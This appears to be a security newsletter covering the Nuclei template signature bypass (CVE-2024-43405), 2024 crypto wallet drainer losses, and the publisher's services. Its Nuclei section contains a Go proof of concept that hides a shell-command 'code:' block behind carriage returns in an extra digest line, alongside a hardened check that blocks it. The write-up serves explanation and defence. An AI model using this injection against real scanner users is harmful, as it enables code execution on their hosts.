Today’s Topics:
- Critical Nuclei Vulnerability Enables Signature Bypass and Code Execution
- Wallet Drainer Malware Steals Nearly $500 Million in Cryptocurrency in 2024
- How can Netizen help?
Critical Nuclei Vulnerability Enables Signature Bypass and Code Execution
A high-severity vulnerability has been uncovered in ProjectDiscovery’s Nuclei, a popular open-source vulnerability scanner. The flaw, tracked as CVE-2024-43405, carries a CVSS score of 7.4 and could allow attackers to bypass signature checks and execute malicious code, posing significant risks to users.
The issue, which affects Nuclei 3.0.0 and later up to the fixed release, arises from a discrepancy between how the signature verifier and the YAML parser treat newline characters. Combined with the way the verifier handles multiple signature lines, this lets an attacker inject malicious content into a template while the signature remains valid for the benign portion.
Nuclei uses YAML-based templates to probe applications, infrastructure, cloud platforms, and networks for security flaws, and it verifies template signatures so that only trusted templates are executed. Wiz, the cybersecurity firm that found the flaw, showed that this verification step, the component meant to guarantee template integrity, can be bypassed: an attacker can craft a template that passes the check and runs arbitrary code on the host performing the scan.
At the core of the vulnerability is the regular expression (regex) used to locate the signature line. The multi-line regex treats only “\n” as a line terminator, so a carriage return (“\r”) is just another character inside the current line, whereas the YAML parser treats “\r” as a line break. An attacker can therefore add a second “# digest:” line that carries malicious YAML after a “\r”: the verifier strips the whole regex line before hashing, so the signed content still matches, but the YAML parser splits the same bytes at the “\r” and parses the hidden content as additional template lines.
“The verification logic only validates the first ‘# digest:’ line,” explains Wiz researcher Guy Goldenberg. “Additional lines are ignored during verification but remain executable by the YAML parser, creating a significant security gap.”
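To make the parser discrepancy concrete, the following is an added example written for this summary in Go, the language Nuclei is written in; it is not code from Nuclei, ProjectDiscovery or Wiz. It models the pre-3.3.2 flow as described above: a multi-line regex locates the “# digest:” line, the first match supplies the signature, every match is stripped before hashing, and the hash is checked against an ECDSA signature. A second helper models how a YAML scanner splits the same bytes, where CR, LF and CRLF are all line breaks. The template text, the injected “code:” payload, the key pair, the exact regex pattern and the verifyHardened mitigation are this example's own assumptions; Nuclei's real signing format, hashing and fix may differ.

```go
package main

import (
	"bytes"
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/sha256"
	"encoding/hex"
	"fmt"
	"regexp"
	"strings"
)

// Constructed sample template and injection (not real Nuclei templates).
// The injection is a second digest line whose payload hides behind bare
// carriage returns: the regex sees one comment line, a YAML scanner sees
// three extra lines (a top-level "code:" key with a shell command).
const benignTemplate = "id: benign-check\ninfo:\n  name: benign\n  severity: info\n"
const injection = "# digest: 00\rcode:\r  - engine: sh\r    source: id\n"

// Multi-line regex locating the digest line (assumed shape, not copied from
// Nuclei). In Go's RE2 syntax "." and "(?m)$" know only "\n" as a line
// terminator; a bare "\r" is an ordinary character inside the line.
var reDigest = regexp.MustCompile(`(?m)^#\sdigest:\s.+$`)

// hashedBody is the template as the signature covers it: every regex-visible
// digest line stripped, then surrounding whitespace trimmed.
func hashedBody(tpl []byte) []byte {
	return bytes.TrimSpace(reDigest.ReplaceAll(tpl, nil))
}

// signTemplate appends a "# digest:" line carrying an ECDSA P-256 signature
// over sha256(hashedBody(tpl)); tpl is assumed to end with a newline.
func signTemplate(priv *ecdsa.PrivateKey, tpl []byte) ([]byte, error) {
	h := sha256.Sum256(hashedBody(tpl))
	sig, err := ecdsa.SignASN1(rand.Reader, priv, h[:])
	if err != nil {
		return nil, err
	}
	out := append([]byte{}, tpl...)
	return append(out, "# digest: "+hex.EncodeToString(sig)+"\n"...), nil
}

// verifyLegacy models the pre-3.3.2 check: the FIRST digest line supplies the
// signature, and ALL digest lines are removed before hashing.
func verifyLegacy(pub *ecdsa.PublicKey, tpl []byte) bool {
	line := reDigest.Find(tpl)
	if line == nil {
		return false
	}
	sigHex := bytes.TrimSpace(bytes.TrimPrefix(line, []byte("# digest: ")))
	sig, err := hex.DecodeString(string(sigHex))
	if err != nil {
		return false
	}
	h := sha256.Sum256(hashedBody(tpl))
	return ecdsa.VerifyASN1(pub, h[:], sig)
}

// yamlLines models how a YAML scanner splits the same bytes: "\r\n", "\n"
// and a bare "\r" are all line breaks. This is the view the engine executes.
func yamlLines(tpl []byte) []string {
	s := strings.ReplaceAll(string(tpl), "\r\n", "\n")
	s = strings.ReplaceAll(s, "\r", "\n")
	return strings.Split(strings.TrimRight(s, "\n"), "\n")
}

// verifyHardened is this example's mitigation (not ProjectDiscovery's patch):
// reject any template where the regex view and the YAML view could differ
// (any CR byte) and any template carrying more than one digest line.
func verifyHardened(pub *ecdsa.PublicKey, tpl []byte) bool {
	if bytes.ContainsRune(tpl, '\r') || len(reDigest.FindAll(tpl, -1)) != 1 {
		return false
	}
	return verifyLegacy(pub, tpl)
}

// Outcome collects both verifiers' results for the signed and the tampered
// template, plus the tampered template as a YAML scanner would see it.
type Outcome struct {
	LegacySigned, LegacyTampered     bool
	HardenedSigned, HardenedTampered bool
	TamperedYAML                     []string
}

// RunScenario signs the benign template with a fresh key, appends the
// injection, and runs both verifiers over both versions.
func RunScenario() (Outcome, error) {
	priv, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		return Outcome{}, err
	}
	signed, err := signTemplate(priv, []byte(benignTemplate))
	if err != nil {
		return Outcome{}, err
	}
	tampered := append(append([]byte{}, signed...), injection...)
	return Outcome{
		LegacySigned:     verifyLegacy(&priv.PublicKey, signed),
		LegacyTampered:   verifyLegacy(&priv.PublicKey, tampered),
		HardenedSigned:   verifyHardened(&priv.PublicKey, signed),
		HardenedTampered: verifyHardened(&priv.PublicKey, tampered),
		TamperedYAML:     yamlLines(tampered),
	}, nil
}

func main() {
	o, err := RunScenario()
	if err != nil {
		panic(err)
	}
	fmt.Printf("legacy: signed=%v tampered=%v | hardened: signed=%v tampered=%v\n",
		o.LegacySigned, o.LegacyTampered, o.HardenedSigned, o.HardenedTampered)
	fmt.Printf("YAML view of tampered template: %q\n", o.TamperedYAML)
}
```

Running it shows the legacy verifier accepting both the signed and the tampered template, because the second digest line (carriage returns included) is removed before hashing, while the YAML view of the tampered bytes contains “code:” and its two child lines as separate lines. The hardened variant rejects the tampered template on the first check; the general lesson is that a signature must be computed over exactly the bytes the consuming parser will act on, with line-ending handling that agrees between the two.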
The vulnerability highlights a critical weakness in Nuclei’s template verification process, making it a single point of failure for ensuring template integrity. Organizations running untrusted or community-contributed templates are particularly at risk, as attackers could exploit this to execute arbitrary commands, exfiltrate data, or compromise systems.
Following responsible disclosure, ProjectDiscovery addressed the issue on September 4, 2024, with the release of Nuclei version 3.3.2. Users should update to 3.3.2 or later (3.3.7 is the latest release at the time of writing) and should not run untrusted templates with code execution enabled.
“Attackers could craft templates with manipulated ‘# digest’ lines or strategically placed ‘\r’ line breaks to bypass verification,” Goldenberg notes. “Without proper validation or isolation, these malicious templates can lead to severe consequences, including system compromise and data breaches.”
Wallet Drainer Malware Steals Nearly $500 Million in Cryptocurrency in 2024
In 2024, wallet drainer malware emerged as a major threat in the cryptocurrency space, resulting in the theft of nearly $500 million (about $494 million) from over 332,000 victims. According to Scam Sniffer, a firm specializing in anti-scam solutions, this was a 67% increase over the previous year, making drainers one of the most lucrative avenues for cybercriminals.
Wallet drainers operate by deceiving users into authorizing malicious transactions, typically through phishing sites that prompt the victim's wallet to sign a token approval or transfer, after which the attacker siphons off the funds. The largest single theft recorded in 2024 amounted to $55.48 million. Only 30 incidents resulted in losses exceeding $1 million each, but together those 30 accounted for $171 million of the total.
The first quarter of the year was particularly harsh, with over 175,000 victims losing $187.2 million. Although the frequency of attacks decreased in the latter half of the year, significant heists continued, the most notable in August and September, with losses of $55.48 million and $32.51 million respectively.
Scam Sniffer attributed the surge in early 2024 to a peak in phishing activity. As the year progressed, the decline was linked to market adjustments and the exit of prominent drainer operations such as Pink Drainer and Inferno Drainer. Despite this reduction, the cumulative impact of these attacks remained severe.
Complementing these findings, Chainalysis reported that overall cryptocurrency thefts in 2024 exceeded $2.2 billion. A significant portion was attributed to North Korean state-sponsored actors, including the $308 million in Bitcoin stolen from the Japanese exchange DMM Bitcoin, which the FBI publicly attributed to North Korea in December, underscoring the growing sophistication and international reach of cryptocurrency-related cybercrime.
How Can Netizen Help?
Netizen ensures that security gets built in, not bolted on. We provide advanced solutions to protect critical IT infrastructure, such as our popular “CISO-as-a-Service” offering, through which companies can leverage the expertise of executive-level cybersecurity professionals without bearing the cost of employing them full time.
We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type.
Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.
Netizen is a CMMI V2.0 Level 3, ISO 9001:2015, and ISO 27001:2013 (Information Security Management) certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans.